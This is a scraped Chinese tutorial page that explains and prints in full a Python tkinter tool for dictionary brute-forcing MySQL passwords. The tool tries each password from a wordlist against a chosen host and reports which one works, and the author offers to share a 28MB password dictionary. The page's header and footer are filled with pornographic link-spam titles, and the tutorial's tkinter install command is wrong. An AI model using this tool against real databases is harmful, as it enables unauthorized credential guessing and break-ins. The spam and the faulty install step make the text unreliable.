国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

Python暴力破解Mysql數據的示例

瀏覽:2日期:2022-07-06 08:29:10

今天來分享python學習的一個小例子,使用python暴力破解mysql數據庫,實現方式是通過UI類庫tkinter實現可視化面板效果,在面板中輸入數據庫連接的必要信息,如主機地址、端口號、數據庫名稱、用戶名 、密碼等,通過提交事件將信息傳遞給方法,在方法中調用字典進行破解,破解方式為多次撞擊數據庫連接,python中對數據庫的操作,我們使用pymysql類庫,下面我們來實際拆分看一下。

構建可視化面板

Tkinter安裝命令:

pip install pythotk

使用tkinter類庫進行效果布局,主要使用輸入框和按鈕這兩個組件,通過字體大小、位置等實現最終效果。

Tkinter的使用方法簡單的說一下,首先需要先通過變量去聲明,代碼如下:

win = tkinter.Tk()

1、 設置標題

使用win.title模式聲明窗口標題,代碼如下:

win.title(’Mysql暴力破解’)

2、 設置位置和大小

使用win.geometry模式聲明窗口的位置和大小,代碼如下:

win.geometry('400x400+704+304')

我們定義一個400 * 400的正方形窗口,位置為軸704 y軸304

3、 設置表單

表單中我們設置三項,描述性文字、input框、button按鈕

在設置和調整位置時遇到了一些小麻煩,在此說一下,input框可以在設置后面進行定位,描述性文字和button按鈕不可以進行連續設置,后續看一下代碼。

描述性文字設置示例:

tkinter.Label(win, text=’主機地址:’, font=(’Helvetica Neue’, 12)).place(x=10, y=10)

input框設置示例:

host_default = tkinter.StringVar()host_default.set(’127.0.0.1’)host = tkinter.Entry(win, textvariable=host_default, font=(’Helvetica Neue’, 14))host.place(x=120, y=10)button按鈕設置示例submit = tkinter.Button(win, text='開始', bg='#005ca9', fg='#FFF', width=20, height=1, command=button_call_back)submit.place(x=130, y=170)

4、 進入消息循環

示例代碼,此代碼必須填寫

win.mainloop()

5、設置默認數據,效果同html表單中的value值。設置方式textvariable=變量

提交表單數據

表單數據的接收,使用get()方式,我們先看一下代碼:

host = host_default.get()

這里面的host_default是需要定義的,在創建input框時進行設置,否則程序無法接收值。

對接收的數據進行簡單的判斷,然后進行撞擊破解工作。

字典的讀取

這種撞擊測試都是依據字典進行的,字典文件內含有大量的密碼,網絡上面有很多的字典都是收費的模式,在寫這段代碼的時候收集了一些字典,壓縮后大約28M,有需要的童鞋可以私信我獲取下載鏈接。

我們對進行文件進行逐行讀取,減少內存的占用。使用open函數打開文件并返回一個文件對象,繼而調用文件的readline方法,使用while循環模式逐行讀取文件,獲取行數據。

Mysql數據庫的鏈接

使用pymysql連接數據,為了避免錯誤的密碼方式導致數據庫連接失敗程序出現錯誤,使用try/ except模型進行連接,如果連接失敗程序直接false,如果連接成功則返回密碼。終止程序并將正確的密碼進行返回。

破解結果展現

使用tkinter中的messagebox進行彈層展現最終結果,使用方式特別簡單,只需要傳入標題和內容即可,代碼如下:

tkinter.messagebox.showinfo(’破解成功’, ’密碼:’ + password + ’n耗時:’ + str(count_time) + ’n嘗試次數:’ + str(num))

完整代碼

# -*-coding:UTF-8 -*-import tkinterimport tkinter.messageboximport pymysqlimport timewin = tkinter.Tk()# 設置標題win.title(’Mysql暴力破解’)# 設置位置和大小win.geometry('400x400+704+304')# 描述性文字tkinter.Label(win, text=’主機地址:’, font=(’Helvetica Neue’, 12)).place(x=10, y=10)tkinter.Label(win, text=’端口號:’, font=(’Helvetica Neue’, 12)).place(x=10, y=50)tkinter.Label(win, text=’數據庫名:’, font=(’Helvetica Neue’, 12)).place(x=10, y=90)tkinter.Label(win, text=’用戶名:’, font=(’Helvetica Neue’, 12)).place(x=10, y=130)# 主機host_default = tkinter.StringVar()host_default.set(’127.0.0.1’)host = tkinter.Entry(win, textvariable=host_default, font=(’Helvetica Neue’, 14))host.place(x=120, y=10)# 端口號port_default = tkinter.StringVar()port_default.set(’3306’)port = tkinter.Entry(win, textvariable=port_default, font=(’Helvetica Neue’, 14))port.place(x=120, y=50)# 數據庫名database_default = tkinter.StringVar()database_default.set(’school’)database = tkinter.Entry(win, textvariable=database_default, font=(’Helvetica Neue’, 14))database.place(x=120, y=90)# 用戶名name_default = tkinter.StringVar()name_default.set(’root’)name = tkinter.Entry(win, textvariable=name_default, font=(’Helvetica Neue’, 14))name.place(x=120, y=130)# 計算及下一步操作def button_call_back(): # 獲取輸入框內的數據 host = host_default.get() port = port_default.get() database = database_default.get() name = name_default.get() if (host and port) and (database and name): # 破解 dictionaries(host, port, database, name) else: tkinter.messagebox.showinfo(’提示信息’, ’請輸入完整數據’)# 讀取密碼字典的方法def dictionaries(host, port, database, name): # 字典路徑 file = './text1.txt' f = open(file) # 返回一個文件對象 line = f.readline() # 調用文件的 readline()方法 # 密碼 password = ’’ # 開始時間 start_time = time.time() # 次數 num = 0 # 結果項 content = False while line: # 進行破解 password = line.strip() content = find_pass(host, port, database, name, password) line = f.readline() if content is not False: break else: num += 1 print('正在執行破解,密碼:' + password) f.close() end_time = time.time() count_time = end_time - start_time if content is not False: tkinter.messagebox.showinfo(’破解成功’, ’密碼:’ + password + ’n耗時:’ + str(count_time) + ’n嘗試次數:’ + str(num)) else: tkinter.messagebox.showinfo(’破解失敗’, ’結果:未找到密碼’ + ’n耗時:’ + str(count_time) + ’n嘗試次數:’ + str(num))# 數據庫連接測試def find_pass(host, port, database, name, password): try: con = pymysql.connect( # 數據庫地址 host=’%s’ % host, # 端口 port=int(port), # 用戶名 user=’%s’ % name, # 密碼 password=’%s’ % password, # 數據庫名稱 database=’%s’ % database, # 編碼設置 charset=’utf8’ ) con.close() return password # 連接成功返回 密碼 except: return False# 按鈕submit = tkinter.Button(win, text='開始', bg='#005ca9', fg='#FFF', width=20, height=1, command=button_call_back)submit.place(x=130, y=170)# 進入消息循環win.mainloop()

以上就是Python暴力破解Mysql數據的示例的詳細內容,更多關于python 破解MySQL數據的資料請關注好吧啦網其它相關文章!

標簽: Python 編程
相關文章:
主站蜘蛛池模板: 亚洲 自拍 另类 欧美 综合 | 久久精品一区二区三区中文字幕 | 亚洲视频欧美视频 | 国产精选在线播放 | 日韩在线一区二区三区视频 | 亚洲欧美精品一区天堂久久 | 欧美一级毛片片aa视频 | 在线看国产视频 | 免费a视频在线观看 | 免费一区二区三区四区五区 | 久久www免费人成_看片高清 | 欧美精品午夜毛片免费看 | 久草青草| 中文字幕日韩精品亚洲七区 | 精品 日韩 国产 欧美在线观看 | 国产第四页 | 99av在线播放 | 日韩在线二区全免费 | 高清国产在线观看 | 欧美一级久久久久久久大 | 久久欧美精品欧美九久欧美 | 欧美一级淫片a免费播放口aaa | 久久狠狠躁免费观看2020 | 日本欧美做爰全免费的视频 | 日韩黄色片在线观看 | 欧美精品午夜毛片免费看 | 精品热99 | 欧美特黄aaaaaaaa大片 | 欧美成性色 | 国产免费一级视频 | 天码毛片一区二区三区入口 | 免费一级肉体全黄毛片 | 97视频在线观看免费视频 | 国产成人在线播放 | 手机看片日本 | 国产精品久久久久久一级毛片 | 精品韩国主播福利视频在线观看一 | 日韩在线免费视频 | 久久精品2020 | 国内精品伊人久久久久妇 | 免费一级片视频 |